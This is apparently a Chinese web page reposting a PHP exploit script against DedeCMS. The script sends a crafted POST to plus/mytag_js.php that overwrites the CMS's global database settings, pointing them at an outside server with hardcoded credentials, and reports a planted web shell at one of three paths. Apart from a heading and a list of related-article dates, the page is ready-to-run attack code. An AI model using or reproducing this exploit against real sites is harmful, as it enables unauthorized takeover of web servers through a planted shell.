测试方法:

  • #!usr/bin/php -w
  • <?php
  • error_reporting(E_ERROR);
  • set_time_limit(0);
  • print_r('
  • DEDEcms Variable Coverage
  • Exploit Author: [url]www.heixiaozi.com[/url] [url]www.webvul.com[/url]
  • );
  • echo "\r\n";
  • if($argv[2]==null){
  • print_r('
  • +---------------------------------------------------------------------------+
  • Usage: php '.$argv[0].' url aid path
  • aid=1 shellpath /data/cache aid=2 shellpath=/ aid=3 shellpath=/plus/
  • Example:
  • php '.$argv[0].'[url]www.site.com[/url] 1 old
  • +---------------------------------------------------------------------------+
  • ');
  • exit;
  • }
  • $url=$argv[1];
  • $aid=$argv[2];
  • $path=$argv[3];
  • $exp=Getshell($url,$aid,$path);
  • if (strpos($exp,"OK")>12){
  • echo "[*] Exploit Success \n";
  • if($aid==1)echo "[*] Shell:".$url."/$path/data/cache/fuck.php\n" ;
  •  
  • if($aid==2)echo "[*]Shell:".$url."/$path/fuck.php\n" ;
  •  
  • if($aid==3)echo "[*]Shell:".$url."/$path/plus/fuck.php\n";
  •  
  • }else{
  • echo "[*]ExploitFailed \n";
  • }
  • function Getshell($url,$aid,$path){
  • $id=$aid;
  • $host=$url;
  • $port="80";
  • $content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
  • $data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
  • $data .= "Host:".$host."\r\n";
  • $data .= "User-Agent:Mozilla/5.0(Windows NT 5.2; rv:5.0.1)Gecko/20100101Firefox/5.0.1\r\n";
  • $data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
  • $data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
  • //$data .= "Accept-Encoding: gzip,deflate\r\n";
  • $data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
  • $data .= "Connection: keep-alive\r\n";
  • $data .= "Content-Type: application/x-www-form-urlencoded\r\n";
  • $data .= "Content-Length: ".strlen($content)."\r\n\r\n";
  • $data .= $content."\r\n";
  • $ock=fsockopen($host,$port);
  • if (!$ock) {
  • echo "[*] No response from ".$host."\n";
  • }
  • fwrite($ock,$data);
  • while (!feof($ock)) {
  • $exp=fgets($ock, 1024);
  • return $exp;
  • }
  • }
  •  
  • ?>
  • 摘自:http://sebug.net/vuldb/ssvid-20949
  • 相关文章:

    • 2021-12-24
    • 2021-05-17
    • 2022-12-23
    • 2022-12-23
    • 2022-12-23
    • 2021-12-24
    • 2021-12-24
    猜你喜欢
    • 2023-02-22
    • 2022-12-23
    • 2021-09-25
    • 2021-12-24
    • 2022-12-23
    • 2021-12-24
    相关资源
    相似解决方案